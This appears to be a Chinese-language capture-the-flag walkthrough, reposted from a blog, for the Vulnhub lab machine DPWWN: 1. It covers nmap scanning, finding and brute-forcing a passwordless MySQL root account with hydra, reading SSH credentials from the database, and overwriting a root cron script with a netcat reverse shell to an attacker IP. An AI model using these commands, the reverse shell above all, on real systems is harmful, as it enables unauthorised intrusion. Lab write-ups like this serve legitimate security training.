Vulnhub靶机:DPWWN: 1

介绍

系列:dpwwn(此系列共3台)
发布日期:2019 年 8 月 4 日
难度:初级
运行环境:VMware Workstation
目标:取得Root权限
学习:

  • 数据库空口令
  • 计划任务提权

靶机地址:https://www.vulnhub.com/entry/dpwwn-1,342/

信息收集

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

nmap -p- 192.168.229.143
nmap -p 22,80,3306 -A 192.168.229.143
nmap -p 22,80,3306 --script=vuln 192.168.229.143

image.png

连接数据库

fscan探测一下,直接发现了数据库空密码
image.png
如果想尝试爆破的话,也是可以的

gzip -d /usr/share/wordlists/rockyou.txt.gz
hydra -l root -P ./rockyou.txt 192.168.229.143 mysql -f -e nsr

image.png
简单搜寻后,发现疑似SSH账号密码:mistic/testP@$$swordmistic
image.png

SSH登录 & 提权

登录系统后,在当前目录下就看到了一个奇怪的sh文件,阅读其内容不由得想到可能涉及到计划任务。
image.png
果然发现了计划任务,每隔3分钟root就会执行一次,那就写入反弹shell的命令:

echo "nc -e /bin/bash 192.168.229.128 4455" > logrot.sh

image.png
image.png

猜你喜欢

转载自blog.csdn.net/weixin_44288604/article/details/132410038